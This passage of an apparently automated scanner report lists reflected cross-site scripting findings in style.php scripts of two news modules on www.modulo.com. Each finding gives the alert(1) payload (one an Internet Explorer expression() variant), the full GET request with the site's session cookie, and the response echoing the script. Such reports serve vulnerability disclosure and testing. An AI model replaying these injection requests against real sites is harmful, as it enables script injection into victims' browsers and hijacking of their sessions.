Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:47:50 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 2027
Content-Type: text/css

:focus {
   outline: 0;
}

div#news-highlight-1 .gk_news_highlighter{
   font-family: Verdana, Arial;
   font-size: 11px;
   color: #666;
}

div#news-highlight-1{
   width: 990a6b2e<img src=a onerror=alert(1)>6e5eb297985px;
   height: 30px;
   border-top: 1px solid #ffffff;    border-bottom: 1px solid #ffffff;    background: #ffffff;    clear: both;
   overflow: hidden;
}

div#news-highlight-1 .gk_news_highlighter_wrapper{
   float: l
...[SNIP]...

1.14. http://www.modulo.com/modules/mod_gk_news_highlighter/style/style.php [set parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_gk_news_highlighter/style/style.php

Issue detail

The value of the set request parameter is copied into the HTML document as plain text between tags. The payload d07fe<img%20src%3da%20onerror%3dalert(1)>d83a8197e3e was submitted in the set parameter. This input was echoed as d07fe<img src=a onerror=alert(1)>d83a8197e3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_gk_news_highlighter/style/style.php?suffix=news-highlight-1&moduleHeight=30&moduleWidth=990&interfaceWidth=120&extra_divs=1&bgcolor=ffffff&bordercolor=ffffff&set=2d07fe<img%20src%3da%20onerror%3dalert(1)>d83a8197e3e&linkcolor=&hlinkcolor=&textleft_color=&textleft_style=normal HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:48:27 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 2027
Content-Type: text/css

:focus {
   outline: 0;
}

div#news-highlight-1 .gk_news_highlighter{
   font-family: Verdana, Arial;
   font-size: 11px;
   color: #666;
}

div#news-highlight-1{
   width: 990px;
   height: 30px;
   border-top:
...[SNIP]...
light-1 .gk_news_highlighter_interface a.prev,
div#news-highlight-1 .gk_news_highlighter_interface a.next {
   cursor: pointer;
   width: 13px;
   height: 30px;
   display: block;
   background: url('../images/2d07fe<img src=a onerror=alert(1)>d83a8197e3eset.png') no-repeat 0 50%;
   float: left;
}

div#news-highlight-1 .gk_news_highlighter_interface a:hover.prev {
   background-position: -13px 50%;
}

div#news-highlight-1 a,
div#news-highlight-1
...[SNIP]...

1.15. http://www.modulo.com/modules/mod_gk_news_highlighter/style/style.php [suffix parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_gk_news_highlighter/style/style.php

Issue detail

The value of the suffix request parameter is copied into the HTML document as plain text between tags. The payload a2b0d<img%20src%3da%20onerror%3dalert(1)>c20d9067cf8 was submitted in the suffix parameter. This input was echoed as a2b0d<img src=a onerror=alert(1)>c20d9067cf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_gk_news_highlighter/style/style.php?suffix=news-highlight-1a2b0d<img%20src%3da%20onerror%3dalert(1)>c20d9067cf8&moduleHeight=30&moduleWidth=990&interfaceWidth=120&extra_divs=1&bgcolor=ffffff&bordercolor=ffffff&set=2&linkcolor=&hlinkcolor=&textleft_color=&textleft_style=normal HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:47:32 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 2907
Content-Type: text/css

:focus {
   outline: 0;
}

div#news-highlight-1a2b0d<img src=a onerror=alert(1)>c20d9067cf8 .gk_news_highlighter{
   font-family: Verdana, Arial;
   font-size: 11px;
   color: #666;
}

div#news-highlight-1a2b0d<img src=a onerror=alert(1)>
...[SNIP]...

1.16. http://www.modulo.com/modules/mod_gk_news_highlighter/style/style.php [textleft_color parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_gk_news_highlighter/style/style.php

Issue detail

The value of the textleft_color request parameter is copied into the HTML document as plain text between tags. The payload 3ad0b<img%20src%3da%20onerror%3dalert(1)>397536cfcee was submitted in the textleft_color parameter. This input was echoed as 3ad0b<img src=a onerror=alert(1)>397536cfcee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_gk_news_highlighter/style/style.php?suffix=news-highlight-1&moduleHeight=30&moduleWidth=990&interfaceWidth=120&extra_divs=1&bgcolor=ffffff&bordercolor=ffffff&set=2&linkcolor=&hlinkcolor=&textleft_color=3ad0b<img%20src%3da%20onerror%3dalert(1)>397536cfcee&textleft_style=normal HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:48:55 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 2036
Content-Type: text/css

:focus {
   outline: 0;
}

div#news-highlight-1 .gk_news_highlighter{
   font-family: Verdana, Arial;
   font-size: 11px;
   color: #666;
}

div#news-highlight-1{
   width: 990px;
   height: 30px;
   border-top:
...[SNIP]...

   text-align: right;
   line-height: 30px;
   z-index: 1000;
}

div#news-highlight-1 .gk_news_highlighter_interface .text{
   float: left;
   display: block;
   width: auto;
   padding-left: 5px;
   color: #3ad0b<img src=a onerror=alert(1)>397536cfcee;    font-style: normal;    }

div#news-highlight-1 .gk_news_highlighter_interface div {width: 30px; float: right;}
div#news-highlight-1 .gk_news_highlighter_interface a.prev,
div#news-highlight-1 .gk_news_h
...[SNIP]...

1.17. http://www.modulo.com/modules/mod_news_show_gk3/style/style.php [img_height parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_news_show_gk3/style/style.php

Issue detail

The value of the img_height request parameter is copied into the HTML document as plain text between tags. The payload 8e245<img%20src%3da%20onerror%3dalert(1)>caaf3b45482 was submitted in the img_height parameter. This input was echoed as 8e245<img src=a onerror=alert(1)>caaf3b45482 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_news_show_gk3/style/style.php?modid=newsshow3&news_content_header_pos=0&news_content_image_pos=0&img_height=08e245<img%20src%3da%20onerror%3dalert(1)>caaf3b45482&img_width=0&news_content_info_pos=1&news_content_readmore_pos=0&news_content_text_pos=1 HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:47:38 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 2275
Content-Type: text/css

#newsshow3 a.readon_class{
   }

#newsshow3 h2.gk_news_show_news_header {
   margin: 0 0 8px;
   padding:0;
font-size:14px;
   }

#newsshow3 img.gk_news_show_news_image {
   }

#newsshow3 img.gk_news_show_news_image_static {
   height: 08e245<img src=a onerror=alert(1)>caaf3b45482;}

#newsshow3 a.gk_news_show_news_readmore {
}

#newsshow3 a.gk_news_show_news_readmore_inline {
   margin-left: 10px;
}

#newsshow3 p.gk_news_show_news_text {
   margin-top: 0px;
   text-align: left;}

#ne
...[SNIP]...

1.18. http://www.modulo.com/modules/mod_news_show_gk3/style/style.php [img_height parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_news_show_gk3/style/style.php

Issue detail

The value of the img_height request parameter is copied into the HTML document as plain text between tags. The payload 33861<x%20style%3dx%3aexpr/**/ession(alert(1))>c0dd913fe90 was submitted in the img_height parameter. This input was echoed as 33861<x style=x:expr/**/ession(alert(1))>c0dd913fe90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /modules/mod_news_show_gk3/style/style.php?modid=newsshow1&news_content_header_pos=1&news_content_image_pos=0&img_height=033861<x%20style%3dx%3aexpr/**/ession(alert(1))>c0dd913fe90&img_width=0&news_content_info_pos=0&news_content_readmore_pos=0&news_content_text_pos=1 HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/risk-management-in-government
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01; __utma=202267277.689599910.1330703379.1330703379.1330703379.1; __utmb=202267277.2.10.1330703379; __utmc=202267277; __utmz=202267277.1330703379.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:48:11 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 2302
Content-Type: text/css

#newsshow1 a.readon_class{
   }

#newsshow1 h2.gk_news_show_news_header {
   margin: 0 0 8px;
   padding:0;
font-size:14px;
   text-align: left;}

#newsshow1 img.gk_news_show_news_image {
   }

#newsshow1 img.gk_news_show_news_image_static {
   height: 033861<x style=x:expr/**/ession(alert(1))>c0dd913fe90;}

#newsshow1 a.gk_news_show_news_readmore {
}

#newsshow1 a.gk_news_show_news_readmore_inline {
   margin-left: 10px;
}

#newsshow1 p.gk_news_show_news_text {
   margin-top: 0px;
   text-align: left;}

#ne
...[SNIP]...

1.19. http://www.modulo.com/modules/mod_news_show_gk3/style/style.php [modid parameter] previous

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.modulo.com
Path:	/modules/mod_news_show_gk3/style/style.php

Issue detail

The value of the modid request parameter is copied into the HTML document as plain text between tags. The payload f9165<img%20src%3da%20onerror%3dalert(1)>fae648d767d was submitted in the modid parameter. This input was echoed as f9165<img src=a onerror=alert(1)>fae648d767d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/mod_news_show_gk3/style/style.php?modid=newsshow3f9165<img%20src%3da%20onerror%3dalert(1)>fae648d767d&news_content_header_pos=0&news_content_image_pos=0&img_height=0&img_width=0&news_content_info_pos=1&news_content_readmore_pos=0&news_content_text_pos=1 HTTP/1.1
Host: www.modulo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.modulo.com/
Cookie: ff045d487523efa4a6a78ae9367a3ac7=f710a0f93ffc685802d13bf7af4d03c0; model01_tpl=model01

Response

HTTP/1.1 200 OK
Date: Fri, 02 Mar 2012 18:47:27 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Content-Length: 3629
Content-Type: text/css

#newsshow3f9165<img src=a onerror=alert(1)>fae648d767d a.readon_class{
   }

#newsshow3f9165<img src=a onerror=alert(1)>fae648d767d h2.gk_news_show_news_header {
   margin: 0 0 8px;
   padding:0;
font-
...[SNIP]...

Report generated by XSS.Cx at Sat Sep 01 08:39:11 EDT 2012.